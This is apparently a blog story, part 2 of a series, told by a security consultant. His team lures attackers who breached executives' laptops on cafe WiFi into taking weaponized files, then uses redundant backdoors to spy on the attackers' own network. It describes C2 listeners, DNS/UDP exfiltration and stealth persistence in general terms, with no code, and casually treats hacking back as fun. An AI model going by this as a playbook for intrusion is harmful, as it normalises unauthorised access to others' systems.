A Team Effort - Part 2
Continues from Part 1.
When D and I entered the TOC, Y was already there talking to the two guys on the ground. They followed the execs that morning and again they stopped at the cafe. This time they were ready with a control inside the execs' computers. A few minutes after one of the principals opened his laptop and connected to the cafe's WIFI network, the attackers were on it like flies. The team members were also running a sniffer. The combination of the sniffer and the monitoring software at the exec's computers provided us real time info as to what the attackers were trying to do. We saw they ran an exploit and gained access to the computer.
Once their backdoor was installed, they connected back to a listener or C2 computer. A listener is a program that accepts connections from a backdoor. The simple ones are usually a terminal running netcat, the more complex ones allow the bad guys to send command to the backdoor via different channels and protocols. We were ready for this. As soon as the backdoor made its first connection we were able to detect it. We saw the bad guys immediately began scanning the computers. We had several Word documents and PDFs weaponized and ready to be picked up by them. They had names and content that would be too juicy not to copy them. And they did.
The backdoor used plain, cleartext HTTP requests to exfil the data. I can only assume they did this because it was the initial breach and on a public network and that they would eventually switch to a more stealthy piece of attack code. Regardless, it was good because the sniffer was able to record this. They copied our files. We also sent an HTML request of our own with a download link to the attack code we prepared for them. We saw it getting picked up by the bad guys.
At the TOC D, Y and I were ready with the listeners in case our backdoors began transmitting. I called the security officer at our client's offices and gave him a SITREP, one of many to follow.
The execs finished their coffee and continued their way to the local office. The security people from our customer called them a few minutes later and explained what happened and that they should not connect those laptops to the corporate network.
Meanwhile, we saw no activity on the listeners we had at the TOC. For the next 2 hours we had nothing. But then a shell opened on one of the listeners. Great!
Now the project went from a security assessment, to a digital VIP protection, to a full on offensive digital intelligence gathering. We were asked by our customer to see who these people were and extract as much intel as we could.
Now we were having fun!
We took turns with the listener's shell. The first thing we did was to install another backdoor, a different one. For redundancy: if the first one gets compromised and blocked, we would still have a way in. If these guys were good, they would eventually notice the first backdoor. It was using UDP and DNS requests to send the data back to us. It was slow, but fast enough for us to have almost real time access to the computer. The second backdoor was more complex and provided realtime access with several levels of crypto and the capability to perform complex automated searches for files, network nodes, etc.
D focused on getting as much information about the lay of the ground: IP addresses, routing tables, system domains, computer names, etc. Since this information can be obtained by using simple OS commands, it was the first thing we did. Then Y set to configure the new backdoor and hide our presence a bit more. Then it was my turn. I was in charge of finding the best way to perform the network recon given the data we collected so far.
After another SITREP to the customer and a quick conference call with the guys on the ground, we decided to leave them in place and continue to follow the execs, who now were aware they were being followed and played along so we wouldn't tip off the attackers.
We set the recon and let the backdoor loose. The crawler module would try to find the information we requested and report back.
In the meantime, our first backdoor was killed. I don't know whether this was because the attackers found it or because they were blocking UDP. It didn't matter, we still had the second one and this one would be a very difficult to find and block - well, unless you disconnect the computer from the network. It had several ways to send the information, using different protocols or by injecting itself to other applications already connected to the internet.
With that set, we went to work on the data we collected initially, while the guys on the ground were getting ready for a full on SDR to see if they could detect the attackers following the principals.
Continues on Part 3. Stanby.